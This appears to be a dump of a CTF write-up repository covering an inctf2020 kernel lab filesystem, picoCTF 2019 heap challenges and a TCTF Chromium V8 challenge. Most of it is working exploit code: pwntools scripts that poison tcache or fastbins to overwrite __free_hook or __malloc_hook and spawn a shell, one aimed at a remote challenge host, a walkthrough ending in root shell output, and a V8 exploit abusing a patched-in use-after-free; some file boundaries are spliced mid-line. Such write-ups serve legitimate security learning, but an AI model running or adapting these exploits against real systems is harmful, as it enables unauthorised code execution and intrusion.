-------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/uname: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/unexpand: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/uniq: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/unix2dos: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/unlzma: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/unlzop: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/unxz: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/unzip: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/uptime: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/users: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/usleep: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/uudecode: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/uuencode: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/vconfig: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/vi: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/vlock: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/volname: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/wall: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/watch: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/watchdog: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/wc: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/wget: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/which: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/who: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/whoami: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/whois: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/xargs: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/xz: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/xzcat: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/yes: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/zcat: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/zcip: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/exploit: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r4j0x00/ctf-writeups/aa13537192c6e9eba5e724d609403faee659ba5a/inctf2020/Lab9/fs/exploit -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/exploit_modprobe_path: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r4j0x00/ctf-writeups/aa13537192c6e9eba5e724d609403faee659ba5a/inctf2020/Lab9/fs/exploit_modprobe_path -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/flag: -------------------------------------------------------------------------------- 1 | inctf{} 2 | -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/home/user/root: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r4j0x00/ctf-writeups/aa13537192c6e9eba5e724d609403faee659ba5a/inctf2020/Lab9/fs/home/user/root -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/init: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | export PATH=/bin 3 | 4 | [ -d /dev ] || mkdir -m 0755 /dev 5 | [ -d /sys ] || mkdir /sys 6 | [ -d /proc ] || mkdir /proc 7 | [ -d /tmp ] || mkdir /tmp 8 | [ -d /run ] || mkdir /run 9 | [ -d /root ] || mkdir /root 10 | [ -d /etc ] || mkdir /etc 11 | [ -d /home ] || mkdir /home 12 | 13 | echo 'root:x:0:0:root:/root:/bin/sh' > /etc/passwd 14 | echo 'root:x:0:' > /etc/group 15 | chmod 644 /etc/passwd 16 | chmod 644 /etc/group 17 | 18 | adduser user --disabled-password 19 | 20 | chown -R root:root / 21 | chmod 700 /flag 22 | chmod u+s /bin/busybox 23 | 24 | chmod 700 -R /root 25 | chown user:user -R /home/user 26 | chmod 777 /home/user 27 | chmod 755 /dev 28 | 29 | mkdir -p /var/lock 30 | mount -t sysfs -o nodev,noexec,nosuid sysfs /sys 31 | mount -t proc -o nodev,noexec,nosuid proc /proc 32 | ln -sf /proc/mounts /etc/mtab 33 | mount -t devtmpfs -o nosuid,mode=0755 udev /dev 34 | mkdir -p /dev/pts 35 | mount -t devpts -o noexec,nosuid,gid=5,mode=0620 devpts /dev/pts || true 36 | mount -t tmpfs -o "noexec,nosuid,size=10%,mode=0755" tmpfs /run 37 | 38 | insmod /mod.ko 39 | mknod /dev/mod c 100 0 40 | chmod o+rw /dev/mod 41 | 42 | echo 1 > /proc/sys/kernel/kptr_restrict 43 | echo 1 > /proc/sys/kernel/perf_event_paranoid 44 | 45 | cat < ', name) 11 | 12 | def add(size, content): 13 | p.sendlineafter('> ', '1') 14 | p.sendlineafter('> ', str(size)) 15 | p.sendafter('> ', content) 16 | 17 | def free(idx): 18 | p.sendlineafter('> ', '2') 19 | p.sendlineafter('> ', str(idx)) 20 | 21 | def reintroduce(name): 22 | p.sendlineafter('> ', '3') 23 | p.sendafter('> ', name) 24 | return p.recvuntil('1.',drop=True) 25 | 26 | init(p64(0)+p64(0x61)+p64(0)+p64(0x21)*((0x100-32)/8)) 27 | add(0x58,'e') #0 28 | add(0x58,'a') #1 29 | free(0) 30 | free(1) 31 | free(0) 32 | add(0x58,p64(0x602040)) #2 33 | add(0x58,p64(0)) #3 34 | add(0x58,p64(0)) #4 35 | add(0x58,p64(0)) #5 36 | reintroduce(p64(0x0)+p64(0x91)) 37 | free(5) 38 | libc.address = u64(reintroduce('A'*16)[:-2][-6:]+"\x00"*2)-0x3c4b78 39 | main_arena = libc.address+0x3c4b20 40 | log.success('Libc at: '+hex(libc.address)) 41 | log.success('Main arena: '+hex(libc.address+0x3c4b20)) 42 | reintroduce(p64(0)+p64(0x61)) 43 | add(0x58,p64(0)) #6 44 | reintroduce(p64(0x0)+p64(0x41)) 45 | free(6) 46 | reintroduce(p64(0x0)+p64(0x61)) 47 | free(6) 48 | reintroduce(p64(0)+p64(0x61)+p64(main_arena+18)) 49 | add(0x58,'a') #7 50 | add(0x58,'\x00'*54+p64(libc.symbols['__malloc_hook']-0x15)) #8 51 | add(0x20,"\x00"*5+p64(libc.address+0xf02a4)) #9 52 | free(3) 53 | free(3) 54 | p.interactive() 55 | -------------------------------------------------------------------------------- /picoctf/2019/pwn/sice_cream/libc-2.23.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r4j0x00/ctf-writeups/aa13537192c6e9eba5e724d609403faee659ba5a/picoctf/2019/pwn/sice_cream/libc-2.23.so -------------------------------------------------------------------------------- /picoctf/2019/pwn/sice_cream/sice_cream: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r4j0x00/ctf-writeups/aa13537192c6e9eba5e724d609403faee659ba5a/picoctf/2019/pwn/sice_cream/sice_cream -------------------------------------------------------------------------------- /picoctf/2019/pwn/zero_to_hero/README.md: -------------------------------------------------------------------------------- 1 | # Zero To Hero 2 | This was a fun challenge from picoctf 2019. It was rated 500 points and had very few solves during the ctf. Although it wasn't that tough. 3 | 4 | ## Description 5 | Now you're really cooking. Can you pwn this service?. Connect with `nc 2019shell1.picoctf.com 49929`. [libc.so.6](https://2019shell1.picoctf.com/static/40beb534349dda031d3c84a1ac1b4710/libc.so.6) [ld-2.29.so](https://2019shell1.picoctf.com/static/40beb534349dda031d3c84a1ac1b4710/ld-2.29.so) 6 | 7 | ## Quick Overview 8 | It's a 64 bit dynamically linked elf executable - 9 | ```console 10 | root@kali:~/picoctf-2019/zero_to_hero# file ./zero_to_hero 11 | ./zero_to_hero: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /root/picoctf-2019/ld-2.29.so, for GNU/Linux 3.2.0, BuildID[sha1]=cf8bd977ca01d23e9b004a6dc637d6ab7c56e656, stripped 12 | ``` 13 | 14 | Running checksec - 15 | ```console 16 | root@kali:~/picoctf-2019/zero_to_hero# checksec ./zero_to_hero 17 | [*] '/root/picoctf-2019/zero_to_hero/zero_to_hero' 18 | Arch: amd64-64-little 19 | RELRO: Full RELRO 20 | Stack: Canary found 21 | NX: NX enabled 22 | PIE: No PIE (0x3ff000) 23 | RUNPATH: './' 24 | ``` 25 | Checksec shows us that Everything except PIE is enabled. We'll later see that our solution works regardless of PIE. 26 | 27 | Running the binary - 28 | ```console 29 | From Zero to Hero 30 | So, you want to be a hero? 31 | y 32 | Really? Being a hero is hard. 33 | Fine. I see I can't convince you otherwise. 34 | It's dangerous to go alone. Take this: 0x7f777a154ff0 35 | 1. Get a superpower 36 | 2. Remove a superpower 37 | 3. Exit 38 | > 39 | ``` 40 | When we run it, it asks us y/n we send y and it loads the main program. It leaks us an address (probably some libc address?). 41 | 42 | ## Decompiling & Analyzing the code 43 | 44 | main function - 45 | ```c 46 | void __fastcall __noreturn main(int a1, char **a2, char **a3) 47 | { 48 | int v3; // [rsp+Ch] [rbp-24h] 49 | char buf[24]; // [rsp+10h] [rbp-20h] 50 | unsigned __int64 v5; // [rsp+28h] [rbp-8h] 51 | 52 | v5 = __readfsqword(0x28u); 53 | setvbuf(stdin, 0LL, 2, 0LL); 54 | setvbuf(stdout, 0LL, 2, 0LL); 55 | setvbuf(stderr, 0LL, 2, 0LL); 56 | puts("From Zero to Hero"); 57 | puts("So, you want to be a hero?"); 58 | buf[read(0, buf, 0x14uLL)] = 0; 59 | if ( buf[0] != 121 ) 60 | { 61 | puts("No? Then why are you even here?"); 62 | exit(0); 63 | } 64 | puts("Really? Being a hero is hard."); 65 | puts("Fine. I see I can't convince you otherwise."); 66 | printf("It's dangerous to go alone. Take this: %p\n", &system); 67 | while ( 1 ) 68 | { 69 | while ( 1 ) 70 | { 71 | sub_400997(); 72 | printf("> "); 73 | v3 = 0; 74 | __isoc99_scanf("%d", &v3); 75 | getchar(); 76 | if ( v3 != 2 ) 77 | break; 78 | sub_400BB3(); 79 | } 80 | if ( v3 == 3 ) 81 | break; 82 | if ( v3 != 1 ) 83 | goto LABEL_10; 84 | sub_400A4D(); 85 | } 86 | puts("Giving up?"); 87 | LABEL_10: 88 | exit(0); 89 | } 90 | ``` 91 | 92 | create superpower - 93 | ```c 94 | unsigned __int64 sub_400A4D() 95 | { 96 | __int64 v0; // rbx 97 | size_t size; // [rsp+0h] [rbp-20h] 98 | unsigned __int64 v3; // [rsp+8h] [rbp-18h] 99 | 100 | v3 = __readfsqword(0x28u); 101 | LODWORD(size) = 0; 102 | HIDWORD(size) = sub_4009C2(); 103 | if ( (size & 0x8000000000000000LL) != 0LL ) 104 | { 105 | puts("You have too many powers!"); 106 | exit(-1); 107 | } 108 | puts("Describe your new power."); 109 | puts("What is the length of your description?"); 110 | printf("> "); 111 | __isoc99_scanf("%u", &size); 112 | getchar(); 113 | if ( (unsigned int)size > 0x408 ) 114 | { 115 | puts("Power too strong!"); 116 | exit(-1); 117 | } 118 | *((_QWORD *)&unk_602060 + SHIDWORD(size)) = malloc((unsigned int)size); 119 | puts("Enter your description: "); 120 | printf("> "); 121 | v0 = *((_QWORD *)&unk_602060 + SHIDWORD(size)); 122 | *(_BYTE *)(v0 + read(0, *((void **)&unk_602060 + SHIDWORD(size)), (unsigned int)size)) = 0; 123 | puts("Done!"); 124 | return __readfsqword(0x28u) ^ v3; 125 | } 126 | ``` 127 | 128 | delete superpower - 129 | ```c 130 | unsigned __int64 sub_400BB3() 131 | { 132 | unsigned int v1; // [rsp+4h] [rbp-Ch] 133 | unsigned __int64 v2; // [rsp+8h] [rbp-8h] 134 | 135 | v2 = __readfsqword(0x28u); 136 | v1 = 0; 137 | puts("Which power would you like to remove?"); 138 | printf("> "); 139 | __isoc99_scanf("%u", &v1); 140 | getchar(); 141 | if ( v1 > 6 ) 142 | { 143 | puts("Invalid index!"); 144 | exit(-1); 145 | } 146 | free(*((void **)&unk_602060 + v1)); 147 | return __readfsqword(0x28u) ^ v2; 148 | } 149 | ``` 150 | 151 | * Looking at the main function, it leaks the address of system as we saw earlier. 152 | * Option 1 allows to create a super power and option 2 to delete a superpower. 153 | * We can only create chunks with size less than 0x408 and we can create only malloc 7 times which means we are limited to tcache. 154 | * Input is taken through the read function, So we can have null bytes in our payload. 155 | * There is a null byte overflow bug while reading the description. 156 | * We have a double free in the delete superpower function as the pointer is not nulled after it's freed. 157 | 158 | ## Exploitation 159 | Now that we have a double free bug, we could simply free it twice and do tcache poisoning and all but that won't work because it's using libc 2.29 and not libc 2.27. 160 | There was a mitigation introduced in libc 2.28 because of which you can no longer double free chunks. 161 | 162 | We can look at the definition of tcache_entry here - https://elixir.bootlin.com/glibc/glibc-2.29/source/malloc/malloc.c#L2904 163 | ```c 164 | typedef struct tcache_entry 165 | { 166 | struct tcache_entry *next; 167 | /* This field exists to detect double frees. */ 168 | struct tcache_perthread_struct *key; 169 | } tcache_entry; 170 | ``` 171 | 172 | It uses the tcache_perthread_struct struct to detect double frees. 173 | In short, when a chunk is freed it checks if its key is equal to the tcache_perthread_struct of the corresponding tcache size and then iterates over the tcache bin to check if it exists already. 174 | If it does, it calls double free detected.... 175 | 176 | Now, one way would be to somehow nullify the key field of the chunk which is already freed. But this is not possible in our case. 177 | 178 | But as we have a null byte overflow bug, the following can be done - 179 | * Create two continuous chunks. (size of the second chunk should be > 0x100) 180 | * Free the first and second chunks. 181 | * Allocate the first chunk again. 182 | * Use the null byte overflow on the first chunk and change the size of the second chunk. 183 | * Now we can again free the second chunk, getting a double free. 184 | 185 | ```python 186 | malloc(0x18,'a') # First chunk 187 | malloc(0x118,'b') # Second chunk 188 | malloc(0x118,'c') # third chunk (just for tcache count) 189 | 190 | free(0) # goes to 0x20 tcache bin 191 | free(2) # goes to 192 | free(1) # 0x120 tcache bin 193 | 194 | malloc(0x18,'A'*0x18) #Allocate chunk 1 back from 0x20 tcache bin and do null byte overflow. 195 | free(1) # chunk 2 size changed to 0x100 so we can double free it. 196 | ``` 197 | 198 | Now that we have a double free, we could simply do tcache poisoning into &__free_hook and write system. 199 | Then freeing a chunk pointing to "/bin/sh\0" will give us a shell. 200 | 201 | ```python 202 | malloc(0xf8,p64(libc.symbols['__free_hook'])) # tcache poisoning 203 | malloc(0x118,'/bin/sh\x00') 204 | malloc(0x118,p64(libc.symbols['system'])) # malloc returns &__free_hook 205 | free(1) # system("/bin/sh") 206 | ``` 207 | 208 | Final exploit - 209 | ```python 210 | #!/usr/bin/env python 211 | 212 | from pwn import * 213 | 214 | p = process('./zero_to_hero') 215 | e = ELF('./zero_to_hero') 216 | libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') 217 | 218 | def malloc(size,data): 219 | p.sendlineafter('> ','1') 220 | p.sendlineafter('> ',str(size)) 221 | p.sendafter('> ',data) 222 | 223 | def free(idx): 224 | p.sendlineafter('> ','2') 225 | p.sendlineafter('> ',str(idx)) 226 | 227 | def die(): 228 | p.sendlineafter('> ','3') 229 | 230 | p.sendlineafter('?\n','y') 231 | 232 | for i in xrange(2): 233 | p.recvline() 234 | 235 | system = int(p.recvline().strip().split(' ')[-1],16) 236 | libc.address = system-libc.symbols['system'] 237 | 238 | log.success('libc base at: '+hex(libc.address)) 239 | log.success('system at: '+hex(system)) 240 | log.success('free hook at: '+hex(libc.symbols['__free_hook'])) 241 | 242 | malloc(0x18,'a') # First chunk 243 | malloc(0x118,'b') # Second chunk 244 | malloc(0x118,'c') # third chunk (just for tcache count) 245 | 246 | free(0) # goes to 0x20 tcache bin 247 | free(2) # goes to 248 | free(1) # 0x120 tcache bin 249 | 250 | malloc(0x18,'A'*0x18) #Allocate chunk 1 back from 0x20 tcache bin and do null byte overflow. 251 | free(1) # chunk 2 size changed to 0x100 so we can double free it. 252 | 253 | malloc(0xf8,p64(libc.symbols['__free_hook'])) # tcache poisoning 254 | malloc(0x118,'/bin/sh\x00') 255 | malloc(0x118,p64(libc.symbols['system'])) # malloc returns &__free_hook 256 | free(1) # system("/bin/sh") 257 | 258 | p.interactive() 259 | ``` 260 | 261 | Running the exploit - 262 | ```console 263 | root@kali:~/bak/picoctf-2019/zero_to_hero# python exp.py 264 | [+] Starting local process './zero_to_hero': pid 965814 265 | [*] '/root/bak/picoctf-2019/zero_to_hero/zero_to_hero' 266 | Arch: amd64-64-little 267 | RELRO: Full RELRO 268 | Stack: Canary found 269 | NX: NX enabled 270 | PIE: No PIE (0x400000) 271 | RUNPATH: './' 272 | [*] '/lib/x86_64-linux-gnu/libc.so.6' 273 | Arch: amd64-64-little 274 | RELRO: Partial RELRO 275 | Stack: Canary found 276 | NX: NX enabled 277 | PIE: PIE enabled 278 | [+] libc base at: 0x7fb33f4df000 279 | [+] system at: 0x7fb33f525ff0 280 | [+] free hook at: 0x7fb33f69b5a8 281 | [*] Switching to interactive mode 282 | $ id 283 | uid=0(root) gid=0(root) groups=0(root) 284 | ``` 285 | -------------------------------------------------------------------------------- /picoctf/2019/pwn/zero_to_hero/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from pwn import * 4 | 5 | #p = process('./zero_to_hero') 6 | p = remote('2019shell1.picoctf.com',49929) 7 | e = ELF('./zero_to_hero') 8 | libc = ELF('./libc.so.6') 9 | 10 | def malloc(size,data): 11 | p.sendlineafter('> ','1') 12 | p.sendlineafter('> ',str(size)) 13 | p.sendafter('> ',data) 14 | 15 | def free(idx): 16 | p.sendlineafter('> ','2') 17 | p.sendlineafter('> ',str(idx)) 18 | 19 | def die(): 20 | p.sendlineafter('> ','3') 21 | 22 | p.sendlineafter('?\n','y') 23 | 24 | for i in xrange(2): 25 | p.recvline() 26 | 27 | system = int(p.recvline().strip().split(' ')[-1],16) 28 | libc.address = system-libc.symbols['system'] 29 | 30 | log.success('libc base at: '+hex(libc.address)) 31 | log.success('system at: '+hex(system)) 32 | log.success('free hook at: '+hex(libc.symbols['__free_hook'])) 33 | 34 | malloc(0x58,'a') 35 | malloc(0x178,'b') 36 | 37 | free(0) 38 | free(1) 39 | 40 | malloc(0x58,'A'*0x58) 41 | free(1) 42 | 43 | malloc(0xf8,p64(libc.symbols['__free_hook'])) 44 | malloc(0x178,'a') 45 | 46 | malloc(0x178,p64(libc.symbols['system'])) 47 | 48 | malloc(0x20,'/bin/sh\x00') 49 | free(6) 50 | 51 | p.interactive() 52 | -------------------------------------------------------------------------------- /picoctf/2019/pwn/zero_to_hero/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r4j0x00/ctf-writeups/aa13537192c6e9eba5e724d609403faee659ba5a/picoctf/2019/pwn/zero_to_hero/libc.so.6 -------------------------------------------------------------------------------- /picoctf/2019/pwn/zero_to_hero/zero_to_hero: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r4j0x00/ctf-writeups/aa13537192c6e9eba5e724d609403faee659ba5a/picoctf/2019/pwn/zero_to_hero/zero_to_hero -------------------------------------------------------------------------------- /tctf/chromium_rce/d8: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r4j0x00/ctf-writeups/aa13537192c6e9eba5e724d609403faee659ba5a/tctf/chromium_rce/d8 -------------------------------------------------------------------------------- /tctf/chromium_rce/exploit.js: -------------------------------------------------------------------------------- 1 | function free(buf) 2 | { 3 | %ArrayBufferDetach(buf.buffer); 4 | } 5 | 6 | function u64(buf) 7 | { 8 | let x = BigInt(0); 9 | for(i=0;i<8;++i) 10 | x += BigInt(buf[i]) << BigInt(i*8); 11 | return x; 12 | } 13 | 14 | function malloc(contents) 15 | { 16 | let x = {}; 17 | for(i=0;i>= 0x8n; 30 | } 31 | return x; 32 | } 33 | 34 | function calloc(size) 35 | { 36 | return new Uint8Array(size); 37 | } 38 | 39 | function encode(s) { 40 | let a = new Uint8Array(s.length); 41 | for (let i = 0; i < s.length; i++) { 42 | a[i] = s.charCodeAt(i); 43 | } 44 | return a; 45 | } 46 | 47 | let a = new Uint8Array(0x1000); 48 | let b = new Uint8Array(0x440); 49 | let c = new Uint8Array(0x440); 50 | 51 | free(b); 52 | free(c); 53 | a.set(c); 54 | 55 | let heap_leak = u64(a.slice(0,8)); 56 | let libc_leak = u64(a.slice(8,16)) - 0x3ebca0n; // - 0x1b9ca0n; 57 | let free_hook = libc_leak + 0x3ed8e8n; //+0x1bc5a8n; 58 | console.log("Heap leak: 0x"+heap_leak.toString(16)); 59 | console.log("Libc leak: 0x"+libc_leak.toString(16)); 60 | console.log("__free_hook: 0x"+free_hook.toString(16)) 61 | 62 | let c1 = calloc(0x80); 63 | free(c1); 64 | c1.set(p64(free_hook)); 65 | 66 | system = libc_leak + 0x4f440n;//+ 0x46ff0n; 67 | f = new Array(0x80).fill(0); 68 | for (i=0;i<8;++i) 69 | { 70 | f[i] = Number(system & 0xffn); 71 | system >>= 8n; 72 | } 73 | malloc(f); 74 | 75 | let _cmd = calloc(0x100); 76 | cmd = "/readflag; sleep 1000" 77 | for(i=0;i(target); 11 | 12 | const overloadedArg = arguments[0]; 13 | try { 14 | @@ -86,8 +86,7 @@ TypedArrayPrototypeSet( 15 | // 10. Let srcBuffer be typedArray.[[ViewedArrayBuffer]]. 16 | // 11. If IsDetachedBuffer(srcBuffer) is true, throw a TypeError 17 | // exception. 18 | - const utypedArray = 19 | - typed_array::EnsureAttached(typedArray) otherwise IsDetached; 20 | + const utypedArray = %RawDownCast(typedArray); 21 | 22 | TypedArrayPrototypeSetTypedArray( 23 | utarget, utypedArray, targetOffset, targetOffsetOverflowed) 24 | diff --git a/src/d8/d8.cc b/src/d8/d8.cc 25 | index 117df1cc52..9c6ca7275d 100644 26 | --- a/src/d8/d8.cc 27 | +++ b/src/d8/d8.cc 28 | @@ -1339,9 +1339,9 @@ MaybeLocal Shell::CreateRealm( 29 | } 30 | delete[] old_realms; 31 | } 32 | - Local global_template = CreateGlobalTemplate(isolate); 33 | Local context = 34 | - Context::New(isolate, nullptr, global_template, global_object); 35 | + Context::New(isolate, nullptr, ObjectTemplate::New(isolate), 36 | + v8::MaybeLocal()); 37 | DCHECK(!try_catch.HasCaught()); 38 | if (context.IsEmpty()) return MaybeLocal(); 39 | InitializeModuleEmbedderData(context); 40 | @@ -2260,10 +2260,7 @@ void Shell::Initialize(Isolate* isolate, D8Console* console, 41 | v8::Isolate::kMessageLog); 42 | } 43 | 44 | - isolate->SetHostImportModuleDynamicallyCallback( 45 | - Shell::HostImportModuleDynamically); 46 | - isolate->SetHostInitializeImportMetaObjectCallback( 47 | - Shell::HostInitializeImportMetaObject); 48 | + // `import("xx")` is not allowed 49 | 50 | #ifdef V8_FUZZILLI 51 | // Let the parent process (Fuzzilli) know we are ready. 52 | @@ -2285,9 +2282,9 @@ Local Shell::CreateEvaluationContext(Isolate* isolate) { 53 | // This needs to be a critical section since this is not thread-safe 54 | base::MutexGuard lock_guard(context_mutex_.Pointer()); 55 | // Initialize the global objects 56 | - Local global_template = CreateGlobalTemplate(isolate); 57 | EscapableHandleScope handle_scope(isolate); 58 | - Local context = Context::New(isolate, nullptr, global_template); 59 | + Local context = Context::New(isolate, nullptr, 60 | + ObjectTemplate::New(isolate)); 61 | DCHECK(!context.IsEmpty()); 62 | if (i::FLAG_perf_prof_annotate_wasm || i::FLAG_vtune_prof_annotate_wasm) { 63 | isolate->SetWasmLoadSourceMapCallback(ReadFile); 64 | diff --git a/src/parsing/parser-base.h b/src/parsing/parser-base.h 65 | index 3519599a88..f1ba0fb445 100644 66 | --- a/src/parsing/parser-base.h 67 | +++ b/src/parsing/parser-base.h 68 | @@ -1907,10 +1907,8 @@ ParserBase::ParsePrimaryExpression() { 69 | return ParseTemplateLiteral(impl()->NullExpression(), beg_pos, false); 70 | 71 | case Token::MOD: 72 | - if (flags().allow_natives_syntax() || extension_ != nullptr) { 73 | - return ParseV8Intrinsic(); 74 | - } 75 | - break; 76 | + // Directly call %ArrayBufferDetach without `--allow-native-syntax` flag 77 | + return ParseV8Intrinsic(); 78 | 79 | default: 80 | break; 81 | diff --git a/src/parsing/parser.cc b/src/parsing/parser.cc 82 | index 9577b37397..2206d250d7 100644 83 | --- a/src/parsing/parser.cc 84 | +++ b/src/parsing/parser.cc 85 | @@ -357,6 +357,11 @@ Expression* Parser::NewV8Intrinsic(const AstRawString* name, 86 | const Runtime::Function* function = 87 | Runtime::FunctionForName(name->raw_data(), name->length()); 88 | 89 | + // Only %ArrayBufferDetach allowed 90 | + if (function->function_id != Runtime::kArrayBufferDetach) { 91 | + return factory()->NewUndefinedLiteral(kNoSourcePosition); 92 | + } 93 | + 94 | // Be more permissive when fuzzing. Intrinsics are not supported. 95 | if (FLAG_fuzzing) { 96 | return NewV8RuntimeFunctionForFuzzing(function, args, pos); 97 | --------------------------------------------------------------------------------